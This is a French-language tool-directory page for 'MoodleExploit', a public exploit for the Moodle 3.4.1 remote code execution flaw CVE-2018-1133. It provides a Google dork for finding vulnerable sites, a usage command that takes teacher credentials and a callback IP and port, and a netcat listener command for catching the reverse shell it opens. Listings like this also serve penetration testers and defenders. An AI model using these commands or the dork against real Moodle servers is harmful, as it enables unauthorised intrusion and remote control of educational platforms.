Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MoodleExploit — Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133 | Kitploit
Outils/GitHubGitHub/darrynten/moodleexploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdarrynten/moodleexploit

MoodleExploit

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Voir le dépôt
1052il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Moodle

  • Titre de l'exploit : Moodle v3.4.1 RCE Exploit
  • Google Dork : inurl:"/course/jumpto.php?jump="
  • Date : 15 mars 2019
  • Auteur de l'exploit : Darryn Ten
  • Page d'accueil du fournisseur : https://moodle.org
  • Lien du logiciel : https://github.com/moodle/moodle/archive/v3.4.1.zip
  • Version : 3.4.1 (Possiblement < 3.5.0 et peut-être même 3.x)
  • Testé sur : Linux avec Moodle v3.4.1
  • CVE : CVE-2018-1133

Un utilisateur avec le rôle d'enseignant peut exécuter du code arbitraire.

Utilisation

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       Le nom d'utilisateur du compte
pass       Le mot de passe du compte
ip         Adresse IP de callback
port       Port de callback
course     ID de cours valide appartenant à l'enseignant

Assurez-vous d'exécuter un listener netcat sur le port spécifié avant d'exécuter ce script.

nc -lnvp 1010

Cela tentera d'ouvrir un shell inverse vers l'IP et le port d'écoute.

Notes

Cet exploit est basé sur des informations fournies par Robin Peraglie.

Télécharger l’outil

Lecture complémentaire : https://blog.ripstech.com/2018/moodle-remote-code-execution